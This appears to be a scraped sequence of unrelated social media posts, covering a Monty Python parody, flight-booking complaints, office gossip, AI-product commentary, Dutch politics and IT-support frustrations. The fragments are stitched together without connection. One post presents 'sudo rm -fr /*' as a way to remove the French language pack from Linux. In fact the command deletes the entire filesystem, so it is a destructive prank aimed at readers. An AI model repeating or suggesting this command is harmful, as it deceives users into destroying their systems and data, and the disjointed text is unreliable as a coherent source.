This website is no more
It has ceased to be
It's expired and gone to meet its maker
This is a late app
It's a stiff
Bereft of life it rests in peace
If you hadn't pinned it to the screen it would be pushing up the daisies
It's rung down the curtain and joined the choir invisible
@lafp É um drama parecido pra comprar passagens de avião dentro do Brasil: se você diz que é brasileiro mas não tem telefone ou endereço (ou cartão de crédito), sempre tenho erro. Esse ano consegui colocando documento estrangeiro 🙄
Are you pissed at the French for their Olympics opening ceremony?
Get revenge by removing the French language pack from your Linux distros:
sudo rm -fr /*
Found out two of my subordinates in my team were having an affair with each other. Can't stand cheating so put them both head-to-head to compete for a promotion. Broke it up, now they barely speak to each other. Job done.
@GergelyOrosz If you need to brag about*how many* AI products you have, it either means that they're not very good, or that you haven't figured out how to apply AI to solve an actual customer need. Or both.
@FelicityHannah Having a knackered kid (and accepting that she'll be late for school) is essentially how I'm approaching it. It's not like this happens too often.
It’s easy to laugh but the situation in the Netherlands is actually quite sad.
A country which used to be known for its competence and stability and good sense is going to be run by idiots and racists.
I mean, it's funny. I've also literally had this experience of waking up to a user just to press the Power button on their computer. But it's not really their fault. That's why we have IT in the first place.
Or perhaps: it's literally the IT people's job to figure out what's actually wrong. This process of digging down on the real issue only works if you *know* how it works. And most users of most things don't, and shouldn't have to. It's not irrational, it's (justifiably) ignorant.
The reason IT support people are so bitter is that YOU (I mean YOU) cannot rationally describe the problem:
You: The Internet is down
IT: How do you know the Internet is down?
You: I can't get email.
IT: Is it possible that the email servers are down and the Internet is working just fine? Can you visit Twitter on your browser?
You: Yes, I can visit the twitter website.
IT: Is there any reason other than email to believe the Internet is down?
You: The last time I couldn't get email it was because the Internet was down.
The fact that IT doesn't call you a blithering idiot on every support call demonstrates saintly restraint, even if a little bit of their frustration leaks through.
